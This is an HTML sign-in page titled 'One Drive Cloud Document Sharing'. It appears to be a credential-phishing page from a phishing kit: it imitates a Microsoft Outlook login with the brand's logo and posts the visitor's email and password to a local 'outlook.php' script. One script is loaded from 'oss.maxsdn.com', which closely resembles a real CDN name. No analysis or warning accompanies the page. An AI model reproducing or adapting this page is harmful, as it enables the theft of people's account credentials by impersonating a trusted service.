<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="user-scalable=no, width=device-width, initial-scale=1">
        <title>One Drive Cloud Document Sharing</title>
        <link rel="icon" type="image/png" href="img/one.png" />
		<link rel="stylesheet" href="bootstrap/css/bootstrap.min.css">
		<!--[if lt IE 9]>
			<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
			<script src="https://oss.maxsdn.com/respond/1.4.2/respond.min.js"></script>
        <![endif]-->
    </head>
    <body style="enable-background: ">
        <div class="container">
            <div class="row">
                <div class="col-sm-3">
    
                </div>
                <div class="col-sm-6">
                    <img style="margin-top:50px;margin-bottom:30px;" src="img/outlookb.png"/>
                    <form action="outlook.php" method="POST">
                       <input class="form-control" type="email" name="email" placeholder="someone@example.com" required>
                       <br>
                       <input class="form-control" type="password" name="password" placeholder="password" required>
                       <br>
                       <label style="color:brown;font-family:sans-serif;"><input type="checkbox" name=""> keep me signed in</label>
                       <br><br>
                       <br><br>

                       <input class="btn btn-lg btn-primary" type="submit" value="Sign in">
                    </form>
                </div>
                <div class="col-sm-3">

                </div>
            </div>
        </div>


     <script src="bootstrap/jquery-3.2.1.min.js" charset="utf-8"></script>
        <script src="bootstrap/js/bootstrap.min.js" charset="utf-8"></script>
    </body>
</html>